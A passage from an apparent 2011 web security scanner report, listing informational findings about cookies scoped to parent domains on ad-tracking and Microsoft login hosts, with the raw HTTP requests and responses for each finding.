Cookie: icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw))ByDua)_c8i=$Q>#Pvc?C)P`v@4k0ctqVFM6=0:/(ks:NJow1z9ZK#?lOhm8V#v*7V*E?1lu=H(C*gZx2Ss=I?O/(z']Jx6M-Yi:*bjdCbN.KrKr`@`A[R[IBgy43C@cY2=dfT]IeCUBz69MK3ZUHfnG%ibT_/3-3m.rkh<amjMpWU-*-0Mb+H4y9%P6$Em=F5/V)pO[bZ]mCjKOvYhqRW`a$!QSz7rjRQ:*8M8)%:B[r1vowtVtRH]hjeJl_)9VrN=mFVq3sWLxB]G+VoQOkA7hBRzJ+=^m0Pe)kdaZvNipde7=7[-I#UWot%[$8UCate]WFQ/8*1FSM[7oDlL69<g*fJhpk`_4m05/^79%>*qB=kgR%FhNv(fz5jjk]##:H9`-6G'N]hl:'q6B!1TA>AYt/cEb:`C1Xr3UnD3@1NrztYAoL7ej0/!sPnUHG[>??u?v0KnVr6xKD6NXx@s!ixnTl5I*kZ[_6(`Q7Tq60)ra)#eyePji't21Q`i'CXwEAlUsslmO6c75hE^dm`4aV!iQpu)IMN+9HTTY7v^6]L'_?tY-2m)dTbp_>b8n$fnCKg(zP#*b#WTu.#2]xa(=4I+KTweO!TDHdQ:U-8yV2+e^BGZtf+oc5Gye`@h[wA>fUiG@vI3`o_5^kvHLg]PGyQZoWI>PnoCLnRwd%)7wxrg=H6J:vUQt'5*dU50F]3DuO^8CGS!l/e`A`<>>>BRHx`!u)fSLhN:qx-N5UHv_DRuWHU33e4.aTc:EU8iA1:ERF28?G[jOx/eR:8=g^)[wR/#

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 11:22:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:11 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Wed, 06 Jul 2011 11:22:11 GMT

GIF89a.............!.......,........@..L..;

9.24. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close

<!-- ServerInfo: TK2IDSMLGN1A10 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...

9.25. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:21:55 GMT
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT
X-Brilig-D: D=6320
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999'width='0' height='0'></iframe>

9.26. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=...[SNIP]...; rtc_Vpu9=MLun+AU1Zjhl58oVicYD/kWBGHcgIibabQgQJA+gBQcY2pYD6//1Td8j3nRMIcKwPpn2PwRwX5l/Npcv6Ja8x3lpY0OXdI6G51aiQ/AjaNDM+6Kn9As2sSUgCyULsYT3T/kjf3PsMoYBG4XcrrbH+9HgtyPrE2iKDBU15TgOOCwyGnyS0HnnrDXa3+CAVhZ++LDt72OUmWWcWVlOWlaldOTW2cLn2kbu77yp+Sz5aYfKz4sYIzxKwTXZ8urXMlVMhGvuy1fv6zkHaOs/nspnmb74iR/K3KiI/mNtbQSfGw6QBIPL9u+xmzaBiGCBfneXZITcG2yTQ+U5jgKX3B7OTi6rPo8JAuTR3h129nySeIDyRfOy5BUDVR5RsAVFYZhsdYIJh+oCvL9j0qadIKkc6gwp/mQORtwBZf256Dlqi0Li+1r/fCAfDpLjsGztPlqh12PxsfcinlhEe+YOAXax7b3Q7pfN/fx2vpVTWnZaVBf/dd2opB1luG8VeJsbs0exveUbbwAeRAdn1v3mu2JYmlyF75wAHKs5/ADqjDcNcT8nclxLbox42RrDVJaMTt2h7DYn1TypK6bZkqOilCls9S+r4FV64VxHpgXWaCE7NTHR3+1ffUMCObPSYxMAoiiPH1oD8BgTAW6oxRLiL/2vRUPCa0VEqxbzLOBducsloJRz41zfX/Gj1TsqXYOXqXV98ZnKaBIobBY3VazKLH9id+XOakNQB0a4oQ6lAcjKHrMSVZyqDbeL2vS4mTxzWX6UWh8cE7iTfnhGaVoN9qzCawr1jE0w0JZqHP+kph4pOHfOjnWX6SyLwEt3hVRPUJu1BkarSgb4pe10ueh+NsormC2CMUyoQiC9BZ4Iiqrd+PRvgrCp7S4DE1sZd8hNb7TDGKgtMkBdK7aCs7FXptOV4zFaMtpCJ5p46B181MlWVm67nQEqMkc14FC4fr/BF73rJqmSrQGuI48Zbp2wm/3/Uf2SPhRNAn2ey39U5hdWHmUm1ljPQhGjBrnB1qYYahliEo0v+SKVeIHTJaFHfDzQ7AQxlprx6+awrUabHESLef3pKQccKJe2JA68QoAav2XHYsQoyg5hXuyMm06XUTNU7uQa/oYa5Nvul6koigEJH/9xXf5oRu1LTUvprC/MRH/fDvaaLBhWEbEF5as6pXqtvAPSjNbOIv72ceaMJnQoL+WK50B5GuHUayD0gSFobbz+1WVacVXgYNm97OY03e9BNkqjOj3HSKLZf/Uq46HUVx+ByXK9SJhfyzE7iUKNBrt4id9CpX04DDmNO3xJ+2I+falvmY6KSH4ilanj4+rjr7i81aHetJJ5NJ1cBXKDmyXjF/DmYK9njhYB3nbXN0RqAy0wMaxJsiW9YTgH4W7shk3DDDz49zjkXVwGXvsra9K92eWtxgOoaYppacu6kY8BChJo0zP2Gj26Gtfbng+y/at82PKpBLbMwn7DlQeqRtcwxO4yq8/hQ4msbICaoEAtB6t+TH4BDf0txiBfCfRZ7x9zUplzl8BIl0A3TG578ghy2Vulz3FO4EmIB4i7WWDSFef76/Os0MDOix/8F11+EWlT2/w8c8TqmWzJmaEM/71YathArISjjAseXwXNv4XIWewRYlQOqPySoc/T8hHXCkwNHNJMc2ipXBcO2vo+L/ROawyvWMndN9/7PkJafXsP7577DANsncHgojKI4UVTB3qOf4Uth2pb120AJnvr6m2HO72D7H3dNCNfQHXWmNYpSZVfvS8/CPcFLq8j5QYru5EomwAwLBqoUmECdh905zeALTIUCfDRq3W4V6eHEZVy0msxkxIQg7L42TH6e0Fe+nN+gmkQjAbJSnP173paCTVsqkWsC90oMtKed5k0FogjCbYw7bRyIqlS76gsy76ZpTAF6O0b9bbZZtz68QkWcR1CfP81/fNt+6G8LBZ+wROkpfBXRRm2iLwxW2gCfxSrODy2IH7SsY2FygU6pnnbLI5N0BuuvD9tHQZIEMj2pm+ek03qeEjP1SguARAcrLQEG95BGrDngnZ35vHX5jJm82Aw5n0+tpCxNnxD1kOzipIDJBn0vjGvQA/9VwOSOlB38Avcmj8y2MnqSqVyKX6eOI+O/5btygH3kPFoH5B8axQUD8DKN4CXmSS7MmR2ZnXPq9wZ49aAizaEF/ZxWitMctelhEDG3+9XCIGFwBwUUNKUWvD9sfg0W535n5fzrZk0uFkB6C1R9FBGlc/tIXaOTQ9dVZ05Iw9Gsi8NIEzcYLGGew8tN8xIcsJRvXTCWq4VtSWGT3gJhYD3HVCz+kxsN1JckINznH41UdwaD0yH4tjhSax1tECRkCKKRUd5C5gpPJXm9/0ZYhQHrc5je3ST4w0D9COxdNMmgwsNoJeq9Nq4ISXyJf7vtNM4l+5mERFTehQY8+0EtawUV/C12JCi7Yos8EeG4Fp2t0n8zBdwFMilM0wceCTO59pE7mB+GgFD2agF/CfhJuagoeAx5rPZQ+Fhvkf8vz2w3usemfYqo/LC5TaKi5ajd3TraAoPSRO5HqZ2PwdFUdNvXQiciSdns4tK8tAK07EO4EWFlmuyUMC/W77sBv0XgGOnB4BaKeCyTpYLW26FYdGwuaehBKDdZqrtw+wk53hSMyB0CkhnOSXlCRSjkjtCCqAstyxpXxSKpgPXVUUbrpRtHJoYKqsBbMVz13cGKR3mmsvOOGnOxNrVzqX0pyD+WsHCz1UZ3E8OADtUIQq6Un8HBGydRzyy7h0Q6FFGrKZ8ygkLBiNFQ96gZld4LkwZm0nIyhEI8eLbZizqT9LOP6RbSFtXmhbZLYoFFok60OMk211eTo35TjkHEiTb6fQe+fOWc6KZvaAPN1NM+lVkji+hlLNmJcOITMt6yh0t8bgTporFXO5bpCO3Ktpubfkkg2GAeoO56XChlX+sbNIlwr9UlurYTqsC0BQwYjYIi6uljWZ8xIM0; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==; rsiPus_feb9="...[SNIP]..."; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=...[SNIP]...; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 14:01:09 GMT

GIF89a.............!.......,...........D..;

9.27. http://pix04.revsci.net/G10937/a4/0/0/0.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G10937/a4/0/0/0.302

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G10937/a4/0/0/0.302?tgt=http%3A%2F%2Fib.adnxs.com%2Fseg%3Fmember%3D514%26add_code%3D%7Bsegs%7D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=...[SNIP]...; rtc_Vpu9=...[SNIP]...; rsiPus_TE1N="...[SNIP]..."; rsi_us_1000000="...[SNIP]..."; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=...[SNIP]...; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ib.adnxs.com/seg?member=514&add_code=
Content-Length: 0
Date: Wed, 06 Jul 2011 14:01:07 GMT


9.28. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K08784/b3/0/3/1008211/203785884.js

Issue detail

